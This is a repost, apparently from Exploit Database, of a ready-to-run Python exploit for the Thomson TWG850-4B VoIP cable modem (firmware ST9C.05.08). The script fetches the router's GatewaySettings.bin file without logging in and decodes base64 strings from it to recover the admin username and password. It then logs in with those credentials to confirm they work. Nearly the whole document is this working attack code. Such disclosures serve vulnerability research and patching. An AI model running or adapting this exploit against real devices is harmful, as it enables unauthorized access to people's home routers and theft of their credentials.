Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 – Authentication Bypass

• Exploit Database
• 15 阅读

• 作者： Orwelllabs
  日期： 2015-09-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38067/

• ###############################################################################
  #+-////////////////////////////////////////////////////////////////////////////
  #+-
  #+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access 
  #+- Date: October 22, 2013
  #+- Author: 0rwelllabs
  #+-
  #+- Product: TWG850-4B Wireless VoIP Cable Modem
  #+- Software Version: ST9C.05.08
  #+- Hardware Version: 2.1
  #+- BOOT Revision: 2.1.7i
  #+- Standard Specification Compliant: DOCSIS 2.0
  #+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin
  #+- Firmware Build Time 19:19:19 Thu Feb 17 2011
  #+- Severity: High
  #+-
  #+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  ################################################################################
  
  
  
  import string
  import urllib2
  import sys
  from time import sleep
  import base64
  import binascii
  import os
  
  save= 'log_TWG8504B.txt'
  log = open(save,'w')
  bifi= 'GatewaySettings.bin'
  refi= 'RgComputers.asp'
  R_C = ("\033[0;31m")
  G_C = ("\033[1;32m")
  D_C = ("\033[0m" )
  
  
  def banner():
  os.system('clear')
  print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
  \t- 2013 - O_Orwelllabs\n\n"
  
  
  def hr_data(filename, min=4):
  with open(filename, "rb") as f:
  result = ""
  for c in f.read():
  if c in string.printable:
  result += c
  continue
  if len(result) >= min:
  yield result
  print >> log, result
  result = ""
  print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
  
  def checkcreds(router,username,password):
  auth_handler = urllib2.HTTPBasicAuthHandler()
  auth_handler.add_password(realm='Thomson',
  uri = router,
  user = username,
  passwd= password)
  opener = urllib2.build_opener(auth_handler)
  try:
  urllib2.install_opener(opener)
  status = urllib2.urlopen('%s/%s'%(router,refi))
  print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
  
  except urllib2.URLError, e:
  if e.code == 401:
  print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
  
  def checkvuln(router):
  try:
  print '(+)- Checking if target is vulnerable...'
  req = urllib2.Request('%s/%s'%(router,bifi))
  response = urllib2.urlopen(req)
  page = response.read()
  x = open(bifi,'wb')
  x.write(page)
  x.close()
  sleep(1)
  print '(+)- The target appears to be vulnerable, lets check it better!'
  print '(+)- Searching Credentials...'
  sleep(1)
  for s in hr_data(bifi):
  try:
  dec = base64.decodestring(s)
  if dec.find(':') != -1:
  user,passwd = dec.split(':')
  print '(+)- User: %s%s%s'%(G_C,user,D_C)
  print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
  print '(+)- Checking if creds are OK...'
  checkcreds(router,user,passwd)
  except(binascii.Error):
  pass
  except urllib2.URLError, e:
  print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
  sys.exit(1)
  
  if __name__ == "__main__":
  banner()
  if len(sys.argv) != 2:
  print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C)
  sys.exit(2)
  router = sys.argv[1]
  if not "http" in router:
  router = "http://"+(sys.argv[1])
  checkvuln(router)